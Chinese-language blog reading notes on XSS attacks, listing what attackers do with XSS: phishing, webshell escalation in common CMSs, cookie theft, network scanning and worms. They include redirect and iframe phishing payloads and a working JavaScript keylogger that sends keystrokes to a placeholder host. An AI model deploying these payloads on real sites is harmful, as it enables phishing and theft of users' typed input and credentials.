码迷,mamicode.com
首页 > 其他好文 > 详细

xss跨站脚本攻击与防御读书笔记(原创)

时间:2014-12-16 13:24:05      阅读:271      评论:0      收藏:0      [点我收藏+]

标签:blog   http   ar   io   os   sp   java   on   文件   

XSS在客户端执行 可以任意执行js代码

   0x01  xss 的利用方式

1. 钓鱼      案例:http://www.wooyun.org/bugs/wooyun-2014-076685  我是如何通过一个 XSS 探测搜狐内网扫描内网并且蠕动到前台的

2.钓鱼,伪造操作界面钓鱼

 直接跳转
<script>document.location.href="http://test.com/xxx.htm"

 iframe钓鱼

<iframe src="http://test.com/11.htm" heigt="100%" width="100%">

flash钓鱼

http://www.wooyun.org/bugs/wooyun-2010-02532   

 

3.弹广告刷流量

4.任意POST/GET操作

   如在dz中 后台的储存型XSS可以get uckey,或者get webshell 案例 

http://www.wooyun.org/bugs/wooyun-2010-045716

 在dedecms中 一个储存XSS配合后台文件管理器 getshell

 案例: dedecms利用xss+csrf getshell

http://huakai.paxmac.org/?p=587

wordpess中储存XSS配合模板getshell

 5.html5 中还可以截图

6.窃取cookies

XSS盲打类的

7.XSS键盘记录

var keys=‘‘;document.onkeypress = function(e) 
{ get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;}window.setInterval(function()
{
new Image().src = ‘http://yourhost.com/g.php?c=‘+keys; keys = ‘‘;}, 1000);

  

 8.客户端信息的刺探

  扫描内网
自动提交st2漏洞(案列在黑哥的PPT里面)
ip地址

9.xssworm
10.ddos

xss跨站脚本攻击与防御读书笔记(原创)

标签:blog   http   ar   io   os   sp   java   on   文件   

原文地址:http://www.cnblogs.com/dongchi/p/4166799.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!